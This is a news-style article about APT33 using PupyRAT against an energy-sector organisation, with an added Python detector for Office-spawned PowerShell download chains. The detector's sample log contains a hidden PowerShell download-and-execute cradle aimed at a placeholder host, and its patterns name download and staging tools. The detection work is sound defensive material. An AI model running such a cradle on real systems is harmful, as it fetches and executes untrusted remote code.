
Iran Hacking Group Used Open Source Multi-platform PupyRAT To Attack Energy Sector Organization

A recent report by security researchers revealed that an Iranian hacking group known as APT33 or Elfin used an open source multi-platform remote access trojan (RAT) called PupyRAT to target an energy sector organization in the Middle East.

PupyRAT is a cross-platform RAT that can run on Windows, Linux, macOS, Android and even embedded systems. It is written in Python and can be customized with various modules and plugins. PupyRAT can perform various malicious activities such as keylogging, screen capture, file transfer, webcam access, password dumping, process injection and more.

The researchers from Recorded Future's Insikt Group discovered that the APT33 hackers used a phishing email campaign to deliver a malicious Microsoft Excel document that contained a macro that executed a PowerShell script. The script then downloaded and executed PupyRAT on the victim's machine. The researchers observed that the attackers used PupyRAT to maintain persistence and access the victim's network for at least three weeks in January 2020.

The researchers believe that the APT33 hackers were interested in the energy sector organization's operational technology (OT) network, which controls industrial processes and critical infrastructure. The researchers also noted that the APT33 group has been active since at least 2013 and has targeted various sectors such as aerospace, defense, energy, manufacturing and telecommunications in countries such as Saudi Arabia, United States, United Kingdom, France and Germany.

The researchers advised organizations to implement security best practices such as patching systems, disabling macros, using multi-factor authentication, segmenting networks and monitoring for suspicious activity. They also recommended using threat intelligence to identify and block known indicators of compromise (IOCs) associated with PupyRAT and APT33.
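The delivery chain described above (Excel macro spawning PowerShell that fetches a second stage) is one of the easiest points to detect with process-creation telemetry. The following is an added example, not code from the report or from Recorded Future: it scores constructed Sysmon-style events for an Office parent, a scripting-interpreter child, and download cradle or encoded-command hints on the command line. The log format, the `example.invalid` URL and all sample lines are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a simplified 'key=value|key=value' format
# (modelled loosely on Sysmon Event ID 1 fields; not real telemetry).
SAMPLE_LOG = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage.ps1'))",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe Get-Date",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c echo hi",
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Substrings typical of a script staging a payload over the network.
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitsadmin|certutil", re.I)
# PowerShell's encoded-command switch, often used to hide the URL from casual review.
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\b", re.I)

@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str

def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'ParentImage=...|Image=...|CommandLine=...' record."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score(ev: ProcEvent) -> int:
    """0 = nothing matched; 2 = Office spawned an interpreter; +2 download cradle; +1 encoded."""
    s = 0
    if basename(ev.parent) in OFFICE_PARENTS and basename(ev.image) in SHELL_CHILDREN:
        s += 2
        if DOWNLOAD_HINTS.search(ev.cmdline):
            s += 2
        if ENCODED_FLAG.search(ev.cmdline):
            s += 1
    return s

def find_suspicious(lines, threshold: int = 2):
    """Return (parent, child, score) for every event at or above the threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        s = score(ev)
        if s >= threshold:
            hits.append((basename(ev.parent), basename(ev.image), s))
    return hits
```

Running `find_suspicious(SAMPLE_LOG)` flags the macro-launched PowerShell download cradle at the highest score and the plain Excel-to-cmd.exe spawn at the baseline, while the interactive PowerShell session under explorer.exe is ignored.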

PupyRAT is not the only tool that APT33 hackers use to compromise their targets. The group has also been known to use other custom and open source malware such as Nanocore, StoneDrill, Dropshot, TurnedUp and ALFZ. The group also leverages various legitimate tools such as Mimikatz, LaZagne, RDPWrap and Plink for lateral movement and credential theft.

The motivation and objectives of APT33 are not clear, but some analysts suggest that the group may be acting on behalf of the Iranian government or military. The group may be conducting espionage, sabotage or reconnaissance operations against its adversaries or potential targets. The group may also be seeking to gain access to sensitive information or intellectual property that could benefit Iran's nuclear, military or economic interests.

The threat posed by APT33 and PupyRAT should not be underestimated, especially for organizations in the energy sector or other critical infrastructure sectors. The attackers have demonstrated their ability to infiltrate and persist in their targets' networks for long periods of time, and potentially cause significant damage or disruption. Organizations should take proactive measures to protect their assets and data from this sophisticated and persistent threat actor.